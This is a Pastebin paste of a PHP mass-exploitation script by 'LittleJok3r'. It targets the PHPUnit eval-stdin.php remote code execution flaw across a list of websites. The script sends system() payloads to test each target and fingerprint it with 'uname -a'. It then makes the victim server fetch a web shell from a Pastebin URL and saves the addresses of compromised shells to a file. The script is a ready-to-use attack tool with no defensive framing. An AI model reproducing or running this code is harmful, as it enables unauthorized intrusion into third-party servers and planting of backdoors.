Advertisement
LittleJok3r

PHPUNIT MASS NGEWE

Jul 14th, 2019
1,610
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.11 KB | None | 0 0
  1. <?php
  2. #code by LittleJok3r
  3. #LOKONTOL
  4. error_reporting(0);
  5. function ngecek($kk){
  6.         $data = "<?php system('ls')?>";
  7.         $ch = curl_init();
  8.         curl_setopt($ch, CURLOPT_URL, $kk."/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php");
  9.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  10.         curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
  11.         curl_setopt($ch, CURLOPT_POST, 1);
  12.         $hasil = curl_exec($ch);
  13.         curl_close($ch);
  14.         if(preg_match("/Windows.php|Template|Default.php/", $hasil)){
  15.         echo $kk." VULNERABLE \n";
  16.         $data = "<?php system('uname -a')?>";
  17.          $ch = curl_init();
  18.         curl_setopt($ch, CURLOPT_URL, $kk."/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php");
  19.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  20.         curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
  21.         curl_setopt($ch, CURLOPT_POST, 1);
  22.         $hasil = curl_exec($ch);
  23.         curl_close($ch);
  24.           echo "System : ".$hasil;
  25.           $data = "<?php system('curl -s https://pastebin.com/raw/3cnrPHiC -o uploader.php')?>";
  26.           $ch = curl_init();
  27.         curl_setopt($ch, CURLOPT_URL, $kk."/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php");
  28.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  29.         curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
  30.         curl_setopt($ch, CURLOPT_POST, 1);
  31.         $hasil = curl_exec($ch);
  32.         curl_close($ch);
  33.           $data = "<?php system('ls')?>";
  34.           $ch = curl_init();
  35.         curl_setopt($ch, CURLOPT_URL, $kk."/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php");
  36.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  37.         curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
  38.         curl_setopt($ch, CURLOPT_POST, 1);
  39.         $hasil = curl_exec($ch);
  40.         curl_close($ch);
  41.           if(preg_match('uploader.php', $hasil)){
  42.             echo "SHELL : ".$kk."/vendor/phpunit/phpunit/src/Util/PHP/uploader.php \n";
  43.             $save  = fopen("result.txt", 'w');
  44.             fwrite($save, $kk."/vendor/phpunit/phpunit/src/Util/PHP/uploader.php \n");
  45.             fclose($save);
  46.           } else {
  47.             echo "CAN'T UPLOAD SHELL \n";
  48.           }
  49.  
  50.         } else {
  51.             echo $kk." NOT VULNERABLE \n";
  52.         }
  53. }
  54. $k = explode("\n", file_get_contents($argv[1]));
  55. if($argv[1] == ''){
  56.     echo "Usage: php ".$argv[0]." list.txt \n";
  57. } else {
  58. foreach ($k as $kk) {
  59.     ngecek($kk);
  60.  } }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement